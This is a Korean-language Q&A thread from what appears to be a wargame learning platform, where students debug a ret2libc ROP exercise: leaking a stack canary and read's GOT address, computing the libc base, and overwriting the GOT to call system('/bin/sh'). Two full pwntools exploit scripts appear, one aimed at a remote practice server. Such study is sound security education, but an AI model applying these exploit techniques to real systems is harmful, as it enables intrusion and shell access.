강의를 공부하면서 system 함수의 주소를 계산할 때 read함수의 got를 읽음으로서 read함수의 주소를 알아내고 이 값과 libc.symbols["read"]의 차이를 구함으로서 라이브러리의 시작주소를 알아내는 것으로 이해했는데요 여기서 몇가지 궁금증이생겨 질문드립니다. 1.강의에서의 "/lib/x86_64-linux-gnu/libc-2.27.so"와 같은 라이브러리 주소나 버전은 어떻게 알아내는 건가요? 2.ELF.symbols 메소드는 라이브러리의 시작주소로 부터 함수까지의 오프셋을 알려주는 메소드인가요? 3.read함수의 got를 읽을때 puts함수가 갑자기 나오는 이유를 모르겠습니다ㅠ read함수의 got에는 read함수의 주소가 들어있는 것으로 이해했는데 puts함수에 read함수의 got를 넣어주면 read함수의 주소가 출력되는 건가요?

일단 코드는 이렇게 작성했습니다. from pwn import * def slog(name, addr): return success(": ".join([name, hex(addr)])) context(arch = 'amd64', os = 'linux', log_level = 'debug') p = process('./rop') e = ELF("./rop") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") buf = b"A"*57 p.sendafter("Buf: ", buf) p.recvuntil(buf) cnry = u64(b"\x00"+p.recvn(7)) slog("canary", cnry) read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] pop_rdi = 0x00000000004007f3 pop_rsi_r15 = 0x00000000004007f1 payload = b"A"56 + p64(cnry) + b"A"8 payload += p64(pop_rdi) + p64(read_got) payload += p64(puts_plt) payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_r15) + p64(read_got) + p64(0) payload += p64(read_plt) payload += p64(pop_rdi) payload += p64(read_got+0x8) payload += p64(read_plt) p.sendafter("Buf: ", payload) read = u64(p.recvn(6)+b"\x00"*2) lb = read - libc.symbols["read"] system = lb + libc.symbols["system"] puts = lb + libc.symbols["puts"] slog("read", read) slog("libc base", lb) slog("system", system) slog("puts", puts) p.send(p64(system)+b"/bin/sh\x00") p.interactive() pop rdi, pop rsi r15 가젯은 ropgadget으로 찾아서 입력했습니다. 중간에 gdb.attack(p)로 gdb 봐도 코드가 잘 들어가는 것 같고, 혹시 해서 read_got + 8을 read_got으로 바꿔도 여전합니다. 또 특이하게도 가끔 stack smashing detected가 뜹니다. (보통 뜨지 않음) 어떤 게 문제인지 잘 모르겠습니다...

제공되는 바이너리 파일과 서버에 올라가있는 libc버전이 다른것 같습니다. 저는 libc 버전이 OS와는 독립적으로 컴파일을 하는 순간 결정 (PLT, GOT 값이 고정적이기 때문에) 되는 것이라고 생각하고있는데, 그것이 아니라 컴파일된 바이너리가 어느 OS(각기 다른 libc버전이 설치된 환경)에서 실행되냐에 따라 함수의 실제 주소가 결정되는 것인가요?? 정리를 해보면, libc버전이 달라져도 바이너리 내의 PLT, GOT 주소는 항상 고정적이다.(애초에 libc 버전과 PLT GOT 주소는 관계없다.) 하지만 libc 버전에 따라 PLT GOT에 매핑되어있는 함수의 libc_base 로부터의 오프셋은 바뀐다. 컴파일 당시의 libc 버전은 실행되는 바이너리의 실제 함수 오프셋과 전혀 관계없다. (실행하는 환경의 libc에 따라 실행 중인 바이너리의 라이브러리 함수 오프셋이 결정된다.) 정도로 이해하고 넘어가려고 하는데 혹시 이해를 잘못하고 있는 부분이 있다면 알려주시면 감사하겠습니다. :)

payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_r15) + p64(read_got) + p64(0) payload += p64(read_plt) 우선 이 코드가 이해가 잘 가지 않습니다. 첫번째로는 p64(0)을 뒤에 붙여주는 부분입니다. 어떤 이유로 함수의 인자 뒤에 이것이 붙었는지 잘 모르겠습니다. 두번쨰로는 read함수는 dx가 정해지지 않을 경우 실행이 되지 않는 것으로 알고있는데, 위에 코드에서는 dx가 생략되어 있는 것으로 보입니다. pop dx를 찾기 힘들다는 내용은 강의를 통해 파악했는데 설정해주지 않으면 0x10 이 defalut value로 들어가게 되는건지 여쭙고 싶습니다. 두번째로는 payload += p64(pop_rdi) payload += p64(read_got+0x8) payload += p64(read_plt) 와 p.send(p64(system)+b"/bin/sh\x00") 부분에서 제가 제대로 알고있는지 파악하고 싶은 부분이 있습니다. 제가 이해하기로는 이전에 read함수에서 read_got에 system함수의 실제 주소를 넣어야 하고, 8바이트가 꽉 차기 때문에 p.send(p64(system)+b"/bin/sh\x00")를 통해 read_got와 read_got+0x8을 채워주고, system함수의 인자는 rdi를 통해 받기 때문에 payload += p64(pop_rdi) payload += p64(read_got+0x8) 을 하고, read_plt를 이용하여 system함수로 실행하는 것으로 이해했습니다. 근데 이미 payload에 +해서 전체를 첫 read함수(read(buf, 0x100)에 전달하는거고, 그러면 입력버퍼에 전부 들어가게 되는 것으로 알고 있습니다. 중간에 다시 read_plt에서 read함수를 호출하여 read_got에 입력해주는 구조인거 같은데, 그렇다면 여기서 입력한 값들은 입력버퍼의 뒤에서 부터 채우게 되어 제대로 입력이 되지 않을 것이라고 생각이 됩니다. 제가 제대로 이해하지 못하여 가독성이 떨어지게 쓴것 같습니다. 그래도 답변해주시면 감사하겠습니다.

read = u64(p.recvn(6)+b"\x00"*2) 여기서 왜 6바이트만 받아오는건가요???

로컬에서는 문제 해결이 됐는데, 원격 시도는 계속 실패합니다. 앞서신 분들도 같은 문제가 발생한 것으로 보이는데, 명확한 답변이 없네요. 와이어샤크로 확인해보니 puts 가젯은 정상적으로 실행되었고, 이후 페이로드도 정상적으로 전송이 됐는데, 무슨 문제인지 서버에서 종료 신호를 보내는군요 libc 버전 문제이거나, read 가젯에서 세 번째 인자를 제대로 설정하지 않아서 오류가 난 것으로 보이지만 로컬에서는 통과가 됐는데 참 답답합니다. 혹시 Alignment 문제가 아닌가 해서 nop 가젯 추가해도 같은 결과가 나옵니다. 저 좀 도와주세요 ㅠㅠ

수업에서 제시된 코드에 libc 웹사이트에서 확인한 오프셋으로 수정한 후 코드를 돌렸는데 EOF가 떠서 당황스러워요. 현재 로컬 환경에서 gdb을 이용해보니까 rax 레지스터에 0x00값이 담겨 read가 안되는 상황입니다. 때문에 원격으로 문제 풀이를 진행 중인데, overwrite가 되었는지 확인할 수도 없어서 난처합니다ㅜㅜ 1 from pwn import * 2 def slog(name, addr): 3 return success(": ".join([name, hex(addr)])) 4 p = remote("host1.dreamhack.games", 19709) 5 e = ELF("./rop") 6 #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 7 # [1] Leak canary 8 buf = b"A"*0x39 9 p.sendafter("Buf: ", buf) 10 p.recvuntil(buf) 11 cnry = u64(b"\x00"+p.recvn(7)) 12 slog("canary", cnry) 13 # [2] Exploit 14 read_plt = e.plt['read'] 15 read_got = e.got['read'] 16 puts_plt = e.plt['puts'] 17 pop_rdi = 0x00000000004007f3 18 pop_rsi_r15 = 0x00000000004007f1 19 payload = b"A"0x38 + p64(cnry) + b"B"0x8 20 # puts(read_got) 21 payload += p64(pop_rdi) + p64(read_got) 22 payload += p64(puts_plt) 23 # read(0, read_got, 0x10) 24 payload += p64(pop_rdi) + p64(0) 25 payload += p64(pop_rsi_r15) + p64(read_got) + p64(0) 26 payload += p64(read_plt) 27 # read("/bin/sh") == system("/bin/sh") 28 payload += p64(pop_rdi) 29 payload += p64(read_got+0x8) 30 payload += p64(read_plt) 31 p.sendafter("Buf: ", payload) 32 read = u64(p.recvn(6)+b"\x00"*2) 33 lb = read - 0x110140 34 system = lb + 0x4f550 35 slog("read", read) 36 slog("libc base", lb) 37 slog("system", system) 38 p.send(p64(system)+b"/bin/sh\x00") 39 p.interactive() `

Keyerror = 'read'라는데 read함수는 분명히 쓰였는데 무엇이 문제인가요

똑같은 코드인데 로컬에서는 쉘 실행이 잘되는데 원격으로는 안되네요 ㅠㅠ 서버 libc 버전도 확인해보니 libc-2.31.so 였는데요. read 함수 offset는 130 으로 끝나고 system 함수 offset은 410으로 끝나는 버전이었습니다. 디버깅해보니까 로컬에서 성공할때는 read는 130 system 410이 맞는데 원격에서는 read 140 system 420으로 끝나네요. 근데 원인을 전혀 모르겠어요 같은 코드고 서버로 준 값도 똑같은데 도대체 왜...?? 1) 성공했을때 [+] read: 0x7f8a02e90130 [+] libc base: 0x7f8a02d7f000 [+] system: 0x7f8a02dd4410 2)실패했을때 [+] read: 0x7f59d9bae140 [+] libc base: 0x7f59d9a9d010 [+] system: 0x7f59d9af2420

반복해서 하니 어느 순간 되네요 같은 코드인데....